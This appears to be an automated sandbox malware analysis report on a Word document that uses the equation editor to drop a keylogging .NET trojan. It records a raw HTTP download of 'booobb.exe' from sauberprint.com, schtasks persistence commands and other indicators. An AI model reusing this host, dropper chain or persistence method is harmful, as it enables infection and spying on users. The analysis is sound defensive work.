Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516031777.00000000060BD000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515795061.000000000611A000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.414520303.000000000372F000.00000004.00000001.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmp, newapp.exe, 00000008.00000002.483735795.00000000035BF000.00000004.00000001.sdmp, newapp.exe, 0000000B.00000002.505958916.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, newapp.exe, 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8B643B49-3C8D-42A4-9902-607278FF94D5}.tmp

Jump to behavior

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: sauberprint.com

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /lupin/booobb.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sauberprint.comConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

Jump to behavior

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\booobb[1].exe			Jump to dropped file

.NET source code contains very large array initializations

Source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F86C81Eu002d9255u002d4FC5u002dA8A7u002d333F43D4D423u007d/u0036ABE793Fu002d8399u002d42DCu002dADDBu002d204C80BA7E0A.cs	Large array initialization: .cctor: array initializer size 11951
Source: 11.2.newapp.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F86C81Eu002d9255u002d4FC5u002dA8A7u002d333F43D4D423u007d/u0036ABE793Fu002d8399u002d42DCu002dADDBu002d204C80BA7E0A.cs	Large array initialization: .cctor: array initializer size 11951

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 4_2_003201B4		4_2_003201B4
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 4_2_003279B8		4_2_003279B8
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 4_2_003279C8		4_2_003279C8
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 4_2_00322792		4_2_00322792
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 4_2_00320790		4_2_00320790
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00226060		7_2_00226060
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00225448		7_2_00225448
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_0022D710		7_2_0022D710
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00225790		7_2_00225790
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_0022DE70		7_2_0022DE70
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_0022219F		7_2_0022219F
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00F8BAC8		7_2_00F8BAC8
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00F83EB8		7_2_00F83EB8
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00F85E88		7_2_00F85E88
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00F891B0		7_2_00F891B0
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00F80048		7_2_00F80048
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00F84DB0		7_2_00F84DB0
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00F8B588		7_2_00F8B588
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_04A70048		7_2_04A70048
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_04A73348		7_2_04A73348
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 8_2_001D01B4		8_2_001D01B4
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 8_2_001D79B8		8_2_001D79B8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 8_2_001D79C8		8_2_001D79C8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 8_2_001D0790		8_2_001D0790
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 8_2_001D1792		8_2_001D1792
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_00266060		11_2_00266060
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_00265448		11_2_00265448
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_0026219F		11_2_0026219F
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 11_2_00265790		11_2_00265790
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_001A01B4		12_2_001A01B4
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_001A79B8		12_2_001A79B8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_001A79C8		12_2_001A79C8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_001A7AA8		12_2_001A7AA8
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_001A1492		12_2_001A1492
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 12_2_001A0790		12_2_001A0790
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 17_2_00226060		17_2_00226060
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 17_2_00225448		17_2_00225448
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 17_2_00225790		17_2_00225790
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Code function: 17_2_0022219F		17_2_0022219F

PE file contains strange resources

Source: edufyrigefy4utwgqeoriufj4ce.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: booobb[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: yxnDFepLbf.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: newapp.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 76E90000 page execute and read and write

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: edufyrigefy4utwgqeoriufj4ce.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: booobb[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: yxnDFepLbf.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: newapp.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Found command line output

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................'.........E.R.R.O.R.:. ...................$.................................................-.......................'.....			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................'.........E.R.R.O.(.P.....................$.......................................................X.................'.....			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.R.:. ...........................7.........................................".............................			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.(.P.............................=...............................................X.......................			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................(.........E.R.R.O.R.:. ...................X.........................................................................(.....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................(.........E.R.R.O.(.P.....................X.......................................................X.................(.....

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp'
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe 'C:\Users\user\AppData\Roaming\newapp\newapp.exe'
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC63.tmp'
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe 'C:\Users\user\AppData\Roaming\newapp\newapp.exe'
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp10D3.tmp'
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Process created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC63.tmp'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp10D3.tmp'			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe C:\Users\user\AppData\Roaming\newapp\newapp.exe			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Queries process information (via WMI, Win32_Process)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ecification.doc

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCA31.tmp

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@22/19@14/2

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Creates mutexes

Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe

Mutant created: \Sessions\1\BaseNamedObjects\fjImFVBEVvLOj

.NET source code contains calls to encryption/decryption functions

Source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 11.2.newapp.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 11.2.newapp.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	File read: C:\Windows\System32\drivers\etc\hosts

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

.NET source code contains potential unpacker

Source: edufyrigefy4utwgqeoriufj4ce.exe.2.dr, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: booobb[1].exe.2.dr, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: yxnDFepLbf.exe.4.dr, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.edufyrigefy4utwgqeoriufj4ce.exe.f90000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.f90000.1.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: newapp.exe.7.dr, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.f90000.1.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.edufyrigefy4utwgqeoriufj4ce.exe.f90000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.2.newapp.exe.cc0000.1.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.newapp.exe.cc0000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.2.newapp.exe.cc0000.1.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 11.0.newapp.exe.cc0000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.2.newapp.exe.cc0000.1.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.newapp.exe.cc0000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.newapp.exe.cc0000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.2.newapp.exe.cc0000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.2.newapp.exe.cc0000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 4_2_00C414BF push es; retn 0000h		4_2_00C414C2
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 4_2_00C41469 push es; retn 0000h		4_2_00C4146A
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 4_2_00C41429 push es; retn 0000h		4_2_00C4142A
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00221BE3 push ebx; iretd		7_2_00221C52
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00F81AA2 pushfd ; retn 001Ch		7_2_00F81B89
Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe	Code function: 7_2_00F81A50 push esp; retn 001Ch		7_2_00F81A51
